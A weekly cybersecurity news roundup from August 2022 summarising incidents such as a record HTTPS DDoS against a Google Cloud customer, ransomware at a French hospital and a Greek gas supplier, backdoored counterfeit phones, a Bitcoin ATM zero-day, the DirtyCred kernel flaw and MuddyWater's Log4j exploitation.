Friday, August 26th, 2022
Cybersecurity Week in Review (26/8/22)
Largest HTTPS DDOS Attack Recorded By Google with 46 Million Requests Per Second
Google has been targeted with the largest DDoS attack in history against one of its customers.
Occurring on June 1st, a Google Cloud Armor customer was targeted with 46 million requests per second by a HTTPS DDoS attack. It is the most powerful Layer 7 DDoS attack that has ever been reported to date, surpassing previous records by at least 76%.
The attacker had initially been able to generate only 10,000 requests per second increasing to 100,000 RPS within eight minutes of the attack starting. However, early detection by the Cloud Armor Adaptive Protection was able to prevent the attack from succeeding. A protective rule was recommended by Cloud Armor to the customer and was delivered before the attack reached its full extent. The alert included a recommendation for a rule that can be used to block signatures with malicious intent. This kept the customer’s service online, and its end users were able to continue receiving services.
In total, 5,256 source IP addresses were involved in the attack, originating from 132 countries around the world. Around 31% of the total attack traffic was generated by the top 4 countries.
There is still no information about the malware that is behind this attack but Mēris botnet appears to be the most likely based on the geographical distribution of their use.
French hospital hit by $10M ransomware attack, sends patients elsewhere
A cyberattack on The Center Hospitalier Sud Francilien (CHSF), a 1000-bed hospital located 28km from the centre of Paris and serving an area of 600,000 inhabitants, has resulted in the medical centre referring patients to other establishments and postponing appointments for surgeries.
The attack has targeted the hospital’s business software, storage systems (in particular medical imaging), and the information system relating to patient admissions and making them inaccessible. Those in need of emergency care will be evaluated by CHSF’s doctors, and if their condition requires medical imaging for treatment, they will be transferred to another medical centre. A ransom of $10,000,000 in exchange for a decryption key has been demanded.
Signs of a LockBit 3.0 infection have been identified as LockBit demonstrates a broader targeting scope. If it is responsible for the attack on CHSF, it will violate the RaaS program’s rules, which prohibit affiliates from encrypting systems of healthcare providers. At this time, the attribution to the particular threat group hasn’t been confirmed yet, and LockBit 3.0’s extortion site contains no entry for CHSF yet, so their involvement remains a hypothesis.
Ransomware Gang Leaks Data Allegedly Stolen From Greek Gas Supplier
Over 360 gigabytes of data has been allegedly stolen from Greece’s largest natural gas supplier Desfa by ransomware operation Ragnar Locker.
Desfa, established as a subsidiary of Depa (Public Gas Corporation of Greece) in 2007, operates both the country’s natural gas transmission system and its gas distribution networks.
The cyberattack that impacted the availability of some systems, also resulted in the leakage of data. However, Desfa says it has proactively deactivated IT services to contain the incident, and is gradually restoring them to normal operations.
The cybergang said that they had contacted the company to inform it of a serious vulnerability but after not hearing back they decided to publish the data supposedly stolen from the gas system operator on their Tor website, while also attempting to shame the company.
While it’s unclear how the cybercriminals managed to compromise Desfa, they were previously observed targeting Remote Desktop Protocol (RDP) connections for intrusion, and then deploying a custom virtual machine to perform malicious activities unhindered.
Researchers Find Counterfeit Phones with Backdoor to Hack WhatsApp Accounts
Counterfeit versions of popular smartphone brands are being designed with multiple trojans targeting WhatsApp and WhatsApp Business messaging apps of the budget Android device models.
The malware was discovered in the system partition of at least four different smartphones: P48pro, radmi note 8, Note30u, and Mate40 who all had the long outdated OS 4.4.2 version.
Specifically, the tampering concerns two files “/system/lib/libcutils.so” and “/system/lib/libmtd.so” that are modified in such a manner that when the libcutils.so system library is used by any app, it triggers the execution of a trojan incorporated in libmtd.so.
If the apps using the libraries are WhatsApp and WhatsApp Business, libmtd.so proceeds to launch a third backdoor whose main responsibility is to download and install additional plugins from a remote server onto the compromised devices.
On the other hand, should the app using the libraries turn out to be wpa_supplicant – a system daemon that’s used to manage network connections – libmtd.so is configured to start a local server which allows connections from a remote or local client via the “mysh” console.
It’s been theorized that the system partition implants could have been deployed via a trojan that’s part of the FakeUpdates (aka SocGholish) malware family based on the discovery of a backdoor embedded into the system application responsible for over-the-air (OTA) firmware updates.
Hackers Stole Crypto from Bitcoin ATMs by Exploiting Zero-Day Vulnerability
Another example of an attack on the cryptocurrency industry was confirmed by bitcoin ATM manufacturer General Bytes by exploiting a previously unknown flaw in its software.
“The attacker was able to create an admin user remotely via CAS administrative interface via a URL call on the page that is used for the default installation on the server and creating the first administration user,” the company said in an advisory last week. “This vulnerability has been present in CAS software since version 2020-12-08.”
CAS is short for Crypto Application Server, a self-hosted product from General Bytes that enables companies to manage Bitcoin ATM (BATM) machines from a central location via a web browser on a desktop or a mobile device. The zero-day flaw, which concerned a bug in the CAS admin interface, has been mitigated in two server patch releases, 20220531.38 and 20220725.22.
The goal of the attack was to modify the settings in such a manner that all funds would be transferred to a digital wallet address under the adversary’s control.
The company stated that the issue was never identified despite multiple security audits, but the attack did occur 3 days after publicly announcing a ‘Help Ukraine’ feature. The incident has now been reported to the Czech law enforcement authorities.
Novant Health Says Malformed Tracking Pixel Exposed Health Data to Meta
Over 1.3 million individuals may have had their protected health information (PHI) inadvertently exposed to Meta confirmed healthcare services provider Novant Health.
The potential data breach was the result of an incorrectly configured tracking pixel that Meta had placed on its website according to Novant Health who operate a network of hospitals, clinics, and medical facilities.
The pixel contained code that allows organizations to measure activity on their website, and was used on both Novant’s website and their MyChart patient portal. It had been added in May 2020 before being disabled two years later when Novant Health discovered the potential data exposure after a reporter enquired about the use of MetaPixel.
Potentially impacted information included email addresses, phone numbers, computer IP addresses, contact information the patients entered into Emergency Contacts or Advanced Care Planning, appointment information, selected physician, and data such as button/menu selections and/or content typed into free text boxes.
Although there is no evidence that the information has been acted on by Meta or any 3rd party, Novant Health also say they have not received a definitive response from Meta regarding the potential exposure.
Grandoreiro Banking Trojan Targeting Automotive, Chemicals Manufacturing Industries
Recently identified baking trojan known as The Grandoreio is being utilised by threat actors as a vector for cyberattacks.
Predominantly attacking Spanish speaking countries like Mexico and Spain the campaign has targeted industries such as chemicals manufacturing, automotive, machinery and logistics.
Although the malware has been active in the wild since 2017 becoming a serious threat to Spanish-speaking users, the latest campaign began in June of this year. A number of new features have been added to this new variant such as a revamped command and control mechanism to make it more difficult to detect and analyze.
Attackers utilise social engineering techniques to gain access by sending emails that purport to be from either Attorney General’s Office of Mexico City or The Spanish Public Ministry using topics such as state refunds or cancellations of mortgage loans.
In these emails, victims are redirected to a website where they can download a ZIP archive that contains malicious code. By hiding the file in a PDF document, the attacker is able to trick the victim into launching the Grandoreiro loader module. Now from a remote HTTP file server, the Delphi payload is fetched. The payload is downloaded as a compressed ZIP file of 9.2MB in size.
As soon as it is extracted from the zip file, the loader is responsible for executing it. When the loader reaches this stage, it collects and sends key pieces of data such as system information or cryptocurrency wallets to the C2 as part of the process.
Several anti-analysis and detection avoidance features are added to the malware in order to keep it from being detected. Establishing the foundation for more stealthy operations by laying the groundwork.
Advanced business email compromise campaign targeting Microsoft 365 organizations
A sophisticated business email compromise (BEC) campaign has been targeting Microsoft 365 organizations, leveraging inherent weaknesses in Microsoft 365 Multi-Factor Authentication (MFA), Microsoft Authenticator, and Microsoft 365 Identity Protection.
Unauthorized access to the Microsoft 365 user of an executive in the organization from multiple locations, including Singapore, Dubai, and San Jose, California was identified. The initial compromise leveraged AiTM phishing techniques for initial access, giving the attacker access to the executive’s account and mailbox.
From there a second Microsoft Authenticator app had been set up for the user without their knowledge. This gave the attackers full persistency of the breached account and effectively nullified the value of MFA.
This attack highlights that although MFA is an effective defence mechanism it is not foolproof or a silver bullet as some see it. It should be used as just one of many security layers incorporated to protect your organisation. Location could be utilised as another factor ensuring that only employees located where the office is can gain access. If someone is traveling internationally they can submit their itinerary and be allowed use it for those countries on the dates provided.
8-Year-Old Linux Kernel Bug ‘No Pipe but as Nasty as Dirty Pipe’ Found
A long-standing security vulnerability active in the Linux kernel for over eight years has been revealed.
The Dirty Pipe flaw reported as CVE-2022-0847 with a CVSS score of 7.8, with increased generality and potency has been dubbed “DirtyCred.”
Using the DirtyCred, privileged credentials are swapped for unprivileged ones in order to escalate privileges. To gain privileges, DirtyCred uses the heap memory reuse method rather than overwriting critical kernel data fields.
An unknown vulnerability that is tracked as “CVE-2022-2588” was exploited by DirtyCred to escalate privileges. This CVE-2022-2588 vulnerability is a use-after-free issue. Due to the vulnerability, an attacker with local privileges will be able to crash the system, potentially allowing them to escalate their privileges locally.
Methods to defend against DirtyCred include the isolation of objects based on their type rather than their privileges, ensuring that privileged credentials are kept separate from unprivileged credentials and using “vmalloc”, isolate the object in virtual memory.
Iranian cyberespionage group likely exploiting Log4j vulnerabilities
Popular IT support and management software applications, SysAid, has been hacked by a group with Iranian government links, exploiting Log4j 2 vulnerabilities, according to Microsoft.
Both Microsoft and the U.S. government have identified the group they call MERCURY, also known as MuddyWater, as affiliated with the Iranian Ministry of Intelligence, with the organizations targeted all located in Israel.
The initial break in into SysAid applications occurred on July 23 and 25 of this year. Initial access to victim environments was gained, and from there the Apache vulnerabilities, which allows for remote code execution, were being leveraged.
It has been theorised that it was related to Log4j 2 vulnerabilities based on similar observations in the VMWare attack earlier this year and the idea that the threat actor sought out similar vulnerable internet-facing apps to target. SysAid, which provides IT management tools, might have presented as an attractive target for its presence in the targeted country.
The access was utilised for conducting a number of reconnaissance activities, lateral movement or establishing a persistent presence. That includes stealing user credentials, escalating to administrator privileges and adding malware to startup folders to ensure access even if the victim reboots.
MuddyWater is viewed by many as Iran’s top cyberespionage group, with a heavy presence in Middle Eastern countries as well as Europe and North America. According to a joint alert put out by the U.S. and UK governments in February, the hacking group is “known to exploit publicly reported vulnerabilities” like Log4j and has also targeted public sector organizations and critical infrastructure across the globe, including the telecommunications, defense, and oil and gas sectors as well as local governments.
Source – https://www.scmagazine.com/analysis/threat-intelligence/microsoft-iranian-cyberespionage-group-likely-exploiting-log4j-vulnerability